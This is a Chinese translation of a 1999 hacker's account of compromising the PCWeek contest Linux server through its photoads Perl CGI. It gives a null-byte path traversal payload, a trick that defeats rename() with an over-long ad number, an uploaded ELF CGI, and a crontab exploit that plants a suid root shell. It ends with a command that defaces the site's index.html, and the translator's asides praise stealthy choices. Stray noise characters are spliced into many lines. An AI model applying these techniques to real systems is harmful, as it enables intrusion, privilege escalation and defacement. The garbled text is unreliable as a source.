JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
. a+ \/ G5 v4 w% I( J的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。
9 N& G: N% F; A
1 I$ U  s0 s; b4 [
首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
. k9 \* h; G5 i: h以我们只能从 HTTP 服务器着手了。

+ q9 `1 @  @: Y0 k! alemming:~# telnet securelinux.hackpcweek.com 80
' k4 L3 v, i) a% A8 J( t( JTrying 208.184.64.170...
" [" Q. I: m8 s* m, }Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
  F5 f1 G$ b* u. ]1 h' bPOST X HTTP/1.0
2 m5 }" z7 O  N
8 o% F3 N$ R: V. jHTTP/1.1 400 Bad Request
Date: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
(...)
Connection closed by foreign host.
7 A8 I) N" k! i' C! l' |( F  X/ @lemming:~#
+ r6 F: E. }: L; i0 ?  P
嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
6 \/ b6 C5 b, l# m2 r" a6 b的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
$ j8 x, u" N8 S( B. e/ M1 s6 z了网站DocumentRoot下的目录结构：
* o0 n7 f( S, m+ R3 H7 v: P
) d, ?8 s' Q( |' @7 |/
. s6 H' J! I7 G5 c5 M/cgi-bin
/ c$ h+ L1 Y, \- P$ u/photoads/
; B8 j0 p- r5 p4 O/photoads/cgi-bin
* D% T( W8 \' c8 k* d- l
) E- j. v* b: @很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
www.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
; N3 {" d' `  ^+ d. ~: S/ W我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
7 ]+ D: G, h/ S2 d) ~* m/ _. m! `运行在该主机上的 photoads。
% E# @( M  J9 b8 f' s! t6 T检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
" [9 P9 Z% q0 R$ q2 ]6 B1 p+ xsecurelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
5 W' Y* v, ]1 D; O" \, l% X/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
; q, G9 |. j/ q) E通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
: C. `, M% e6 R9 e( G4 D/ \9 {DocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
. K7 d# n( C" Snobody）等。
$ d2 @# D; w+ U: V& D+ F! @6 N+ N现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
) {2 e' u0 }0 y. i2 n& r命令的漏洞，如：

<!--#include file="..."--> for SSI
5 U0 S2 T0 D8 ]8 I: C2 L: d<!--#perl ...--> for mod_perl

但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
令嵌入到由服务器端解析的 HTML 代码中：
$ Z& }3 D( B/ ^5 t
: E- q* z! S" M8 |% N在 post.cgi，行 36：
; R' V* M* a% N1 u. g" fprint "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";

$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
码中。
请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
在命令行下使用这些文件如下：

; P7 @3 a! z5 R/ K6 a' {1 hlemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
. @- E! u: F* m; R( Z+ g3 ^1 J
& N. Y& |2 `! b* K, @但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
入系统。
8 [4 N! |5 @1 U7 _; D8 d/ S- A7 k+ Y
9 [% E1 `4 F4 X% \% z$ c$ [因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
system() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：

lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
- Y0 @3 P: W3 @, J& y5 H
advisory.cgi: open (DATA, "$BaseDir/$DataFile");
4 b5 f: F( J3 |2 \edit.cgi: open (DATA, ">$BaseDir/$DataFile");
5 h* Y3 f2 \6 }+ z# J, R- E3 Eedit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
1 N5 T, g7 t/ f(...)
2 Z$ @2 I0 _4 k3 {! j( I
. X8 S: l2 K) y# V, @  R$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
我们利用。
+ R2 J# Z& L6 o$ |- N: H, ^但其余两个就……

在 photo.cgi，行 132：
$write_file = $Upload_Dir.$filename;

open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
, f/ a: k. y2 z/ Xclose(ULFD);

' k+ q# g1 T5 \* i因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
$write_file 变量来自：
6 q# T) `1 x# k' V$ Q4 [7 W" \9 g; Z
! ~& h; t9 Y& v! t$write_file = $Upload_Dir.$filename;
( e" S% u' s+ \/ ]' A) E- v
7 A" J/ h5 |: }其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？
" Z: o9 q+ ]/ J1 S3 R8 u1 A9 y, ]
" K) J7 C4 |' G在 photo.cgi，行 226：
0 ^5 b4 B# t2 D0 S- ]3 z6 jif( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
  X5 y, x: @5 f5 v; C6 |  h
# R1 I- i' g' I0 C+ b; {$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

. S, Z- q% L) X! G- B0 E) zif ($filename =~ m/gif/) {
$type = '.gif';
* c7 ], ^7 w. E, U& z}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
}else{
{&Not_Valid_Image}
}
# @, ?* Z/ n( V, ]
由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
+ f  @& q: i' J/ _6 D" l须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
8 e5 |0 e: j3 J& I得任何文件。匹配表达式为：

$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式
! S2 H4 d  f3 l4 l* _( F
/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
& @$ D- G. F8 h) `& p& D4 |
可以成功修改WEB服务器根目录下的index.html文件。:-)
然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
+ ^4 }: N( x  ]（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
删除该上载文件。这当然不是我们所希望的！
( x& R6 F& O0 Q; ?0 p+ ]PCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
* ~. S$ v1 w# @1 D, j而将主要精力集中在GIF上。

$ l7 b* S+ r* g$ Iif ( substr ( $filename, -4, 4 ) eq ".gif" ) {
0 K7 H' B7 l$ lopen ( FILE, $filename );
2 ~/ S: @# [% X- n3 Tmy $head;
my $gHeadFmt = "A6vvb8CC";
! b3 g9 f; \4 s8 e4 V0 ^- Zmy $pictDescFmt = "vvvvb8";
* \8 j9 u  h& W+ K( k9 f3 p: Gread FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
close FILE;
$PhotoWidth = $width;
$PhotoHeight = $height;
+ R; k' H. F' m- c( v1 O4 G% `$PhotoSize = $size;
return;
( R% m2 P2 W4 }6 [3 E  d8 b. v}
- f+ J  v" l4 z: g, g% {! t) }3 r& ]
' \# ^6 [' q( _; T, s, {* m在 photo.cgi，行 140：

if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
; P! K; p- @0 N0 ?2 u}

9 \- ^9 w. ~9 N  f% k+ z1 gif ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}

9 x7 X8 j4 e! ]1 I5 T( B# {由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
% x, \% a6 @; d0 P# Z。
& c4 K- q1 j8 m所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
（NUL）。
0 i& U" o4 D2 G  n  y在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
个问题：
6 f+ F! \2 N! C3 N
chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
- {& ]5 E. b" [4 I( l7 L5 D
( t5 ~4 w. D. iShow_Upload_Success($write_file);
0 O* J8 Y7 {+ }) M9 g" e+ o
哇！文件将被改名/移动（这可是我们绝对不希望的！）。
2 i' I+ ?( Q: x3 o查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：

% B+ M. M6 Y  C0 a3 U/ n$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};

5 M' h3 D1 |/ x- o( H9 ^其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
0 Y$ Q1 Y1 S& a  h* O$ \$ H! {那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
" j/ R' b& X* R该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
6 P) @, a$ L% K/ G+ l! Y3 L# |  Z文件名超过1024字节长，即可绕过这个过滤器。
5 n  w0 \. _+ b所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
) Z9 P$ p; v% D; V发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
9 P  q, [0 [% j6 i我们又遇到另一个难题了！……

9 G+ K) V5 A- o我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
呢？;-)
请阅读用于创建新AD值的程序文件 long.adnum。
2 M# Q/ r/ @! b. {# g当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。
- T* @$ w7 H9 [" ~, D3 b% _5 v
现在就让我们对该主机试一试这个方法。
嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。
# @$ r! B4 j4 |6 Z+ Q- |

让我们试一下是否还有其它入侵方法……
# W+ G# s  w  w2 |, G
我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
些“绝密”文件，然后拿出动卖。:)
我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
+ s7 u- j+ X. H1 d的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
道它有什么用吗？:)）
" E! O8 y- \6 E6 _$ R, g2 d现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
! U% p$ e" ?7 ^- j& x然而，这个以CGI方式运行的shell脚本必须符合以下格式：
: n! x! u  k9 T  T5 E$ j$ z6 i
) ~+ O7 h, S# D0 K% R2 \5 z#!/bin/sh
echo "Content-type: text/html"
  Q+ N. H# w& @find / "*secret*" -print

同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……
8 ~7 X  a4 ?# q- `. @- Y' I; L4 ]
#!/bi\00\00\00\00n/sh

8 g+ v( g2 i. A# l以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
我们无法只用三个字节去获得一个shell。又遇到难题了！:(
6 A3 S( y! j9 k/ c
. l( C4 ~9 ~6 n0 c$ p让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
内容均为0x00。:) Yohoo :)
5 X! N. {( {# p5 v9 F* `' N. X解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
; _2 \8 L  n3 c+ v8 P- _. kURI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。
2 D' D( ^7 j: H  _- C
2 f/ M1 ?$ G$ E' f: p" T; I以下这个程序：
, y1 y! L8 a9 l+ m0 Y
lemming:~/pcweek/hack/POST# cat fin.c
7 c. W, R9 _& R0 F9 ?# m; }2 [#include <stdio.h>
main()
5 T3 q5 f# {/ \. v! j# k{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
+ x5 Z% k3 N" }3 U7 a$ g3 mexeclp("/usr/bin/find","find","/",0);
# ~7 n: z1 Z* G4 o}
/ f( u4 `* y! z4 y2 Z
编译后：

4 n' Z) N) }% J- H* clemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
: |/ C( H  ?0 z/ ~  L1 r* ~
8 @9 ^8 a( q! s4 @: e. p$ _' S优化（清除symbols）后：
  Q5 i4 f" {2 c- y( G3 B! ~
, d2 J7 r; k% r9 @: a; H4 P: Ilemming:~/pcweek/hack/POST# strip fin
  U% t' Z7 W: _4 _4 }/ n: C+ ?lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#

! O9 n2 w( l8 G' b1 bURL编码后：

. W5 E; m3 |3 [/ K7 Ulemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
" \% S# r* Y0 @; r: i2 b# S4 ?: klemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url
+ C: t" Y* C6 M" w
8 o. |: A# Z5 v4 y' Q# F' O这个文件大小超过了限制值。:(
我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
! @. @& y; Y7 X效：

7 \, k8 x* R5 P' h3 Ilemming:~/pcweek/hack/POST# joe fin
% N& J; t- _8 k. W8 p- Slemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
! a/ ]+ o$ j  p6 m* j/ Qlemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
( u! n1 m. B) `. p-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
1 U$ @! w2 D/ O1 xlemming:~/pcweek/hack/POST#

请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。
: }8 ]1 b/ F7 G
3 p- E& K0 G; m) ?" o8 _0 ~, b4 v# l现在，将这个CGI上载到服务器，再用浏览器访问它，如：
! j% A- I' F; H; ~  b: `$ I
wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi
  \: p. m' U' o4 E# f
; A- R6 Q# J* X! G服务器返回的结果相当于在服务器上执行 find / 命令。:)
但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
- G5 V0 U( p$ q2 F我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
[我怀疑这些文件是否真的保存在该服务器上！]

; N/ N9 _$ D! s, f4 e: l
好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
1 m3 L! i- E# B% ?% g6 u我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
0 `! D5 s2 J9 `. D用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
5 G2 D( L7 D/ p& G9 |7 s: O观察其运行结果。
我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
% D5 X( F  y: x; y5 N' ^7 p另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。
+ R& t" {; ^3 v! a8 Z9 O4 s8 v! f
execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);

好了。游戏结束！:)
总共花费了大约20个小时，还算不错！呵呵。:)